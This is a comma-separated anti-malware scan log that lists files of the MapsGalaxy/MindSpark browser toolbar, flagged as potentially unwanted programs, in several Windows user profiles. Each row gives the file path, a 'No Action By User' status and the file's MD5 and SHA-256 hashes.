PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10117B0C, No Action By User, 764, 178422, , , , , 1999EA5D62048AF11012E621F5A65B7B, B0D6AA00E9B54682CBAB031E2EB6D54CB10855A237CDF21EC94361644440644B
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10118F28.bmp, No Action By User, 764, 178422, , , , , 0FF6CD83B6D0BAB447941416A6C20FCB, AD39AC6270CEC063B0748103D75383E1C6A41193992CAA21DED2B5CCAAA40D95
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10300C15.bmp, No Action By User, 764, 178422, , , , , 85D05A1218682566778C6B4B0024588A, A9263A03E9C52736C5E048FA9DA9918AB6CC09725752B928387646DA5F6E2FB7
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\files.ini, No Action By User, 764, 178422, , , , , F0621A11143CEA3B67DE08E8BE71E06F, 649FBECE5612210E479470D242DC9AD3633FD366FE9D5CBABFD1B337C428336E
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\History\search3, No Action By User, 764, 178422, , , , , 0F343B0931126A20F133D67C2B018A3B, 5F70BF18A086007016E948B04AED3B82103A36BEA41755B6CDDFAF10ACE3C6EF
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON\8_step1.gif, No Action By User, 764, 178422, , , , , C6FC97F6D0C1C6FA40F561BA944FA31D, 7AED12A501F79F549F9AE20D8E093D8113A4AFF629A3C5F261E12CFAE24833E1
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON\index.htm, No Action By User, 764, 178422, , , , , E1C629FAB1C2332ECDCBFF6906127C4A, 0C74EC4C5C43BFABBFB3F0C8CB3FF9B52679E8354EA8343B4CE98D9BE97E8803
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON\rebut4b.htm, No Action By User, 764, 178422, , , , , 20EC93A7A3C42F57A95D64EB415BDACE, F448E30DF0379629EDD10BDA0D127EB6907ED22DE0E504F1637C1A4A61EBD7DF
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON\shield.png, No Action By User, 764, 178422, , , , , 72CEC4D630FA66E29D0E5083D27003DF, 1B478CA5EDE682259F5A1EEA0A1CC758324ADD9DD815779AA460B30CA276EB19
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Settings\prevcfg2.htm, No Action By User, 764, 178422, , , , , D702420ED367848550F4EE5F5349942F, F67B8663E1E8D2ADB94456119C7699DA368155CACF097F1E61BC8BB70EED9509
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Settings\setting3.htm, No Action By User, 764, 178422, , , , , C8E25376FD0443689D44808D121F3DCD, 9C4E785F24B9DAB45BAB8D084076930BDF6A7E573BAB972CDEA69E56B5E367A1
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Settings\setting3.htm.bak, No Action By User, 764, 178422, , , , , 5804EB8056C48DBF0E6425D097897C42, 97A8300E659E9F1EE436AE47C2DA3EFED9B908347507830E48755456C6CFCD9D
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Settings\s_w1.dat, No Action By User, 764, 178422, , , , , 0D5B80417EE38C748FE4E7CD79CADD63, 32A782D60E6AA5172938535A64A6F05D04CBB27DE95CA156B83A1E1DFEED8136
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Settings\s_w1.dat.bak, No Action By User, 764, 178422, , , , , 2A7C86222C1D600F2AD8700FAB1C4943, 3E9CA1038247FF9074977868230EC0DB20C201057D95DC5242A28DBC74BABE40
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Settings\s_w2.dat, No Action By User, 764, 178422, , , , , D546FCCE8A1F0BBDB772CED8AC933EAB, 75EE1002474071C2EFAD0CEE51AE19BB53CC4691872EA7039ADBE35D3B862B33
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Settings\s_w2.dat.bak, No Action By User, 764, 178422, , , , , 692D405A896A98863751C148710EF8AD, FCD16F0F5B02E598AC302166E64C1A7918C2B5D4B4A8A9DE143E1ADAAC218EA3
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache\PopupProperties202980343.html, No Action By User, 764, 178422, , , , , 0D30AE0515C11BD1E01BAB9C7F70961E, D648461C763E3F92D1C113CCFFDEF927C680C20582C15CFBE2BE613D46A3560A
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache\PopupProperties202980364.html, No Action By User, 764, 178422, , , , , 0D30AE0515C11BD1E01BAB9C7F70961E, D648461C763E3F92D1C113CCFFDEF927C680C20582C15CFBE2BE613D46A3560A
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache\PopupProperties202980406.html, No Action By User, 764, 178422, , , , , 3E7387D8B63F09C84BF3715134AA9FBF, 42D5E2E46AB6EF47CDC0DAD7A7A97009979A1AFD0A853C9750F48FADD05CC5DF
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache\Radio.html, No Action By User, 764, 178422, , , , , EFE3E57BEC3C386BAC281B53E4C7A101, B0F027CB61638D33A4C05D0BECE3062A85D8B9BBD32C5FEDC02894EE3C561F27
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019D72C, No Action By User, 764, 178422, , , , , 74F90F0D3B6D67CAA9DB5EF9178A78A2, B7E09254E4E3350815134AEA62F9E468036752FB71E0B6895F4C20B4D1E9FDB3
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019E37B, No Action By User, 764, 178422, , , , , 0387B67B158F15315BC10867DBC2ACEA, 27D01972016B83ADD09D360A1F680FB489BF35E0C7712B2603D1F99166B242D1
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019E484.bmp, No Action By User, 764, 178422, , , , , 5E52163916D982FA55E8406F6CE876F2, 1104AE27DEDA59CE5487F26C196B49F710441658A10CD317FE94A25216362F5F
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019E5FB.bmp, No Action By User, 764, 178422, , , , , BFF29672300AEB9C06E453B92FD81133, E1DBA9EE87646C5FD2C532C20DC9660B28415A17A9E43CC13E704F2C5A25AFAD
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019E6B6.bmp, No Action By User, 764, 178422, , , , , E7E7FB7F00A2BE1A9ECCAFEDC858369C, FEEF53D8184ABBBF2F1C51AB90E718B4E01BBED218080DDFCE46879CD6E405DA
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019E771.bmp, No Action By User, 764, 178422, , , , , 495AC8D36181BE77371BACCC50A82D84, F243CF138E7BC2D2211C87AB08CE67BB1CC83A1508734909ECA095A278C8892E
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019E7BF.bmp, No Action By User, 764, 178422, , , , , 339E578E20BA037983347938ADCB69A6, 0BE38D02AB1073BB3557F56C689DFB9AF91C309E7C20A92403845188B566681E
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019E84C.bmp, No Action By User, 764, 178422, , , , , D71AAC4347FF93BF84C30FC4DBE58B59, D4AC3633B04ADDEAFF34E4A4B73E4CA3651B1AE570D0C2469D0190FDE0E353E3
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019E8A9.bmp, No Action By User, 764, 178422, , , , , 7F9EA572F26DECABD9361CAA411EE1E8, 012FC59CD412CF4C28AE132A9D1B11D94923293D3830873B5E7B52D52F538D16
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019EA6E.bmp, No Action By User, 764, 178422, , , , , F26299177F48288C1A7B518ABD5603C1, 3610A00F4531646BB06FF26300E082AD2C19C98042D09813EBB60BBF644D8BEE
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019EABC.bmp, No Action By User, 764, 178422, , , , , 81744A73A1A488730DAD5627709C9990, 07B438E28A0CC48BD1AEF91317373F20864E0426A06919DB142EC3C5130C5D99
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019EB0A.bmp, No Action By User, 764, 178422, , , , , 282A8BADFA69EA2E9B0488C74BF1D5D5, 2D6425E52E9E42FCB96E1BEA4B9165C8F174ECC8922EFF628F892275B9CABBCE
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\0019FB7E.jhtml, No Action By User, 764, 178422, , , , , A255D29F69C32FB3CD02DB41B63F48AC, 700B18EDC64946A18FFE0E07456CCFC5CB32F9D2A1A5F496898E57E6316347CD
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\001A22BC, No Action By User, 764, 178422, , , , , 3CD6056919BBB1804D49033BC21F1893, 3F99115C32881F93AC03853A965C87AB6F92D1B7597E6D45F33C8B5020C63FEA
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\001A3784.bmp, No Action By User, 764, 178422, , , , , C0307B47CA90AF7D5D2DEC6CB0EEB673, 9566696C70B8FB5DC43FDB3958A1B421FD33EC7D1479E2290FA047B93CBD9732
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\3811606D.bmp, No Action By User, 764, 178422, , , , , 4594F00647C320F703B88B0C3A53FA64, EA4E20F71F81D20FA0C656A0CCC94794A23FAFF6CA2855F209B4B43EC6B0BA63
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\381164D1.bmp, No Action By User, 764, 178422, , , , , 12D8CEBDF6F146F24BB61CE5925E7330, E4B09412F300D87CFE9E667568FB1714AA2E67CAE7D9343E7713506BED6F7A22
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\382CFA3D.bmp, No Action By User, 764, 178422, , , , , AB5A336AF16F3FAACA57033E7040750D, 479B9FC2ADA409AEFC6D1F6D370AFCCB200B6765289D27AE91BCD47E0E924C9A
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache\files.ini, No Action By User, 764, 178422, , , , , 68A9AB321CC4845218CB04D0D1A2847E, FCA7A5F021B6DB2AE40F6E84B7143733FA556709D2773A081437FC19201B1763
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\History\search3, No Action By User, 764, 178422, , , , , 0F343B0931126A20F133D67C2B018A3B, 5F70BF18A086007016E948B04AED3B82103A36BEA41755B6CDDFAF10ACE3C6EF
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Settings\prevcfg2.htm, No Action By User, 764, 178422, , , , , 74F90F0D3B6D67CAA9DB5EF9178A78A2, B7E09254E4E3350815134AEA62F9E468036752FB71E0B6895F4C20B4D1E9FDB3
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Settings\setting3.htm, No Action By User, 764, 178422, , , , , 8D3A17E6895F15B2C8C9B2E411251964, 970641FE2334EDB94D30B960DA44AFDA1BEBFD9CFC34029BE194F90328FDB3CB
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Settings\setting3.htm.bak, No Action By User, 764, 178422, , , , , D376EB7A7BAD2BC7A0008182DA582D06, 8F5218521025AD3439B1199C664F7BD9CDF6144CB0703BB59F21942EB93F3424
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Settings\s_w1.dat, No Action By User, 764, 178422, , , , , 0FE38480000D15F4824D6DDBE4FDBE48, 821C504DA332636BA07225D424B3F94C1D7DD1D8A04ECA86609E8E79BEDAB5FC
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Settings\s_w1.dat.bak, No Action By User, 764, 178422, , , , , CA60082E237ED3B4C985A536A290FB73, E22F05025E400FC7BEAD33ABCB8AC3321CAD5795C5CF82DB006D862571B0FFA3
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Settings\s_w2.dat, No Action By User, 764, 178422, , , , , EE3B76CAE4350A98B05F13B0F6E82CD2, 535CFDD72F5C1BD349C3C567734237E3BB0625E136A40CA1AF959F23358C5F2F
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Settings\s_w2.dat.bak, No Action By User, 764, 178422, , , , , DB77760860460E8B224BDAD82368C436, 1C4F56EC1C3A74C9403320C38DC5BA917FCA71451FB845D134BD8582FD02FD0D
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache\PopupProperties202980343.html, No Action By User, 764, 178422, , , , , 716D8CB1D345C2EDE64A4D7C6287C8DA, 018A2DEE8E31E97DC324082F11CCF93AA077280519D9863C8642B9CF5996AC31
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache\PopupProperties202980364.html, No Action By User, 764, 178422, , , , , 716D8CB1D345C2EDE64A4D7C6287C8DA, 018A2DEE8E31E97DC324082F11CCF93AA077280519D9863C8642B9CF5996AC31
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache\PopupProperties202980406.html, No Action By User, 764, 178422, , , , , 14AB1B67AEA8D88DE96DA22A78F3E74B, FF854FD12DC4ACC4CC39B59D4169BA127419343EAC0ADF7679B23EA6D458A50C
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache\Radio.html, No Action By User, 764, 178422, , , , , 90A386C05718204AFEEDA52C70AFCBB8, 044D54870FC87C24E78723CE8BD25A45A0D9659CA7E5B89F35A9710BDCD98A2E
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\btmarrow.png, No Action By User, 764, 178422, , , , , 9552ACDA716E13E800CB66A1C2F6BA15, E116A0B45D656C4FF52F71C61FFE3638C8D807D2119150E0649738D8C166E5ED
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\cancel.png, No Action By User, 764, 178422, , , , , 014BA9CB751089112B72CB14EEE905B4, C02487710C187ABE82B7AC9D894CD9B8C7DB5C173D60BF7981045F7836D57EE5
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\config.js, No Action By User, 764, 178422, , , , , C53FAD04E4AE8110436CF5DD1C97561D, 5A294D49F939C6087BC447BEE28A1DB86889F88A75EEBBDE9E4B1DFE748367E8
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\continue.png, No Action By User, 764, 178422, , , , , D0DA2F828903118AA4973C576708516B, 9607F08803D67AA2539474A50EC0CB3B751B1256DC38B7FD97F18CC94B425B34
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\dispatch.js, No Action By User, 764, 178422, , , , , 690A15DE7A3AF0362E7EE6B41EB314E7, 8E8324007CF991B11147CBC7FA4F4EB867222616F627080A47C33F40C99EBDC7
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\divider.png, No Action By User, 764, 178422, , , , , 93E6B5D0DD9EB1E93C3B07F7F2D5FC8E, FF542FA743AA4DA5D37F9C32A5B4B849AB4DEF1ECFD4E333626A8B0C07F960CD
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\gcancel.png, No Action By User, 764, 178422, , , , , 54E763E8130985D7CF66A93E6017EDEB, 8CAD808847E45F9854AACB6394E2C0018BA845A852F211BB7C01206E975DA69E
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\index.htm, No Action By User, 764, 178422, , , , , 15DC443A542912CA2C24A0608AFC29C2, E89D798C633C8D68AFC40CCF4117CB1FDA281BD1C07346289BF7689C72916DB2
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\infobar.js, No Action By User, 764, 178422, , , , , 9E1484BDC3B79FB11373EFE19D08B07E, 58F41868009D3DCF34DCCBBD045238CE6A2056B361D39B746C073E36C267B895
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\jquery.js, No Action By User, 764, 178422, , , , , B04A3BCCD23DDEB7982143707A63CCF9, 764B9E9F3AD386AAA5CDEAE9368353994DE61C0BEDE087C8F7E3579CB443DE3B
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\la.png, No Action By User, 764, 178422, , , , , 8D3C2E4BBA0F0A7A199261F547EDA801, FC1D485081497AC045E0C989B2D357B9556D1D476E52997D58F8FD372648A6D7
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lbcs.png, No Action By User, 764, 178422, , , , , F4FDAD34608EE0B8DDE98F85E635BBAD, E2E5FB7C2C5CC04B4B64AF03F8B326015D6FB93508BDB45E8C3FAD1063A72BD4
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lbms.png, No Action By User, 764, 178422, , , , , 2F2FC09A6BC2DA05A2B4802889BCF769, 57A0C066541733BD3DB48AB5A535DDEC6CC0136A894E81D89C70D8FA59B8E9F1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lca.png, No Action By User, 764, 178422, , , , , 602E9218366A3AF3129040A1D2455207, ECE4EC15CB16EFD1401123BFC2D22215BCAD667750C9F5E4B44C4467CE4200C1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lcfc.png, No Action By User, 764, 178422, , , , , 6810A20D9DE8982B07F68B8B42FFE056, 8E4D1296933910108C775C312A6709652530D7969133077D57767BD0E15B3E94
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lcm.png, No Action By User, 764, 178422, , , , , F5CFC35ACBBB13168D7719F65F594699, 300022F70E9E1A7E3DA874B3302FAE15A440AE9448BECBF76760F9E0BE9A5ED8
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lcs.png, No Action By User, 764, 178422, , , , , 6D687A359BECD46722EB9EBEB4ABE895, 9F32EE81E0336DB1A0E4B480299368857D46DD71E1286CA4489CF8F3A6D4480A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lcso.png, No Action By User, 764, 178422, , , , , F5E3AB4D2E9F327214669170A0ED5F10, C54250DAE2B0A2605385286A045BD0D6B92894DED6B1019154F42759E9217E53
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lctn.png, No Action By User, 764, 178422, , , , , FC9864056DC600E0CB8D649AFEBF12A8, 6C153D8E5A4FEC8288B885D8D86599E17C1A2AADDC0E5A6BC6023AE3DA52A700
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\ldb.png, No Action By User, 764, 178422, , , , , 1DCD63127EA307D093BD20123B8CCDA7, EED248F66B7DEDA6B7E806A000607CF8C4C447DBFC47A7F8243FA6CB0E4D03D1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\ldbg.png, No Action By User, 764, 178422, , , , , 10199BEC1960A9F8AC6E812D94BCF2C4, FCE46AEC740F299430B9D682EB2036490571B725CC061FD7B220CF04C0BBCC3D
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lddg.png, No Action By User, 764, 178422, , , , , E5FD2FB892E79349A23A1AC7CBF9D86C, 022E6B949FA6C552504A01B1BD262F46C401EA2D8E7A88102FC9400D34385139
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lff.png, No Action By User, 764, 178422, , , , , 0135659EA712BF025E93F0E37E0F1E6C, 67B19DDC3DD17E5ACF3FB9D7F7ABF64E6938A5165CA331261C39402853CDE4C3
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lffb.png, No Action By User, 764, 178422, , , , , 279E1FB668C1DAF2A8DEBBA9CD9EBE01, 88F08DAB35571E253129793DBBFD90600CBBF0D375E117FA54959796F12D5248
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lg.png, No Action By User, 764, 178422, , , , , C5148C3B371D3ED362B70DF9D522981B, F816DD1D0B371F564B37A7232097BB2E0314A99C98FC9966AB7AC1DA4EEBA437
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lgs.png, No Action By User, 764, 178422, , , , , 9BDF7090AB1C2A70C131543A45D7F887, 01B7FB137C30936F907EB8899BE3BF086A1BBF989A5BDFE81921FD8F621627FA
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lgw.png, No Action By User, 764, 178422, , , , , 728C8911A616C1FC43CB270EFB04CECD, E55525AB0FC643673EF903E805B5721447598FDA4E4EA3ACBECE0AB02C43D927
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lha.png, No Action By User, 764, 178422, , , , , E49B90C17E66A7ACE96119F03EA86C7D, B251ADB5588A04B8CAFB1ACCD5FE9976A64F83033AA4ECCC10230DE10D0B852A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lhp.png, No Action By User, 764, 178422, , , , , 342D1F539678454F021E918E171654B9, 47249B88CF4903AAEC1DAA87432DD2F47A65EF372EB05319526E6DF6C567B14B
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lia.png, No Action By User, 764, 178422, , , , , 8B3A56FCC9681AC1CF103A98E0ADD9C5, 90FD97BC8EBBE4B7D8BA658E0AD5B58C1BB3B9FACDC80B184973E6F987621FCE
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\liwon.png, No Action By User, 764, 178422, , , , , 04F21C743EABC6D00DB463F0C5A71F93, 3EB0C337A5286BBE443D5D37E3173B525FFB49F4177E24E68F504B6CB5D56DDA
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lkazulah.png, No Action By User, 764, 178422, , , , , 7CBAE7AA0A05F6E0870E53FED56FC17A, 8E474635BA11AC888E3B59501EB5FCA0ABA52FF7373130BFA263795DEEC15FA7
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lmd.png, No Action By User, 764, 178422, , , , , 3005912C361D561B8658881FD939A9FB, 28741359FC397103CA0D8FD3B8FA3DF681C29EDD2E7231428E6577C895A14433
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lmfc.png, No Action By User, 764, 178422, , , , , A695C8CC48CC35E1C5517DFDAB724751, 581C93C56D34032B7EA91CD98BF3FEA2415097CDDB1FC4BD19CFB5B7756FD53A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lmh.png, No Action By User, 764, 178422, , , , , E2124BFAFC55EC692115033CFAE4E198, 213662C5FED552ECF7EDEE899FFE683A7F8CBD3B9EBAFB934010E888839F2666
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lmma.png, No Action By User, 764, 178422, , , , , 1483A1804C7C955ABEB4C15C93F4C8AE, 3FB9925AEB6B1FDB859104E6AA3EFDAB1EF681E4A141ACDDF832191CC301D0FB
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lmosh.png, No Action By User, 764, 178422, , , , , F4B22C062F472A34B8915EFBA4D1E10D, 7AFFEF2E99770379F515E789144B6C9667A9C43D5AD912B75AC1214FF5534C3F
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lmwf.png, No Action By User, 764, 178422, , , , , 0757141C8F5A8C149F759AC89A5F401D, 285F2586EA31735F6E2C34E6BAA28DCBDFDC477D6A006AB35BB92CE6019A018A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lmws.png, No Action By User, 764, 178422, , , , , 1FEED75F27039D092C8CB376CE5B29D4, 48E80F73BFAD1BCED846B44B3EF8210D8836C03793175E8E262E4A3ACC6994E7
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lobm.png, No Action By User, 764, 178422, , , , , 9848BCA168BC5C61A4798FA7F9F0E2B6, 697453B8FA13E7F5232049D2C7868C0DD91D24F933D012A2DFC65E953EBC329D
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\loryte.png, No Action By User, 764, 178422, , , , , D9DB2D86DB1D102388D96EFCEFDDA444, 695E8C84B8181D01211D77B012EF37FD95B5C088751FD5F12DB858AEE0A4194F
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lpss.png, No Action By User, 764, 178422, , , , , D7F42A065766DFEDFE8946799F38343D, 8BB7FE6074703FF018700274C53AE20E8DF1CA9F7A11405BE26D29B52AAE0F10
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lqc.png, No Action By User, 764, 178422, , , , , FC94F301F90019A121E4594979641D50, AAD7508F96EA5642079A0ABBE034CE8000432E64EB0AC04AED11481FBDA73306
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lrb.png, No Action By User, 764, 178422, , , , , D8F7E1E5E3E42E2A0E09C964F5CCC036, FBFB1214C5CAC49CD410C5F0B0D988ECD9CF1A0B2D4CEB5A6862C177AE6A8AEF
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lrg.png, No Action By User, 764, 178422, , , , , FF4D0960B2E474A8C603DDF7BAC8C2C3, 8945FD825681BAB00FDDB368F1146CF67FC873B0821B4D836EB296B3AFAD528C
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lrr.png, No Action By User, 764, 178422, , , , , 3FA59D5147ECF5AEA75F8A7709E8725A, 56A10A06DC290848829157B5700F1E465E7E324CCB0E05763C65DD51B14FA685
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lsc.png, No Action By User, 764, 178422, , , , , D0F8720922C9721C7C6A68C8EB7DD90E, 110E4E2A824C3A7450FC8751BE4D675C1A5CDB0EFA9FE1F4F36B443CD5A9CE8E
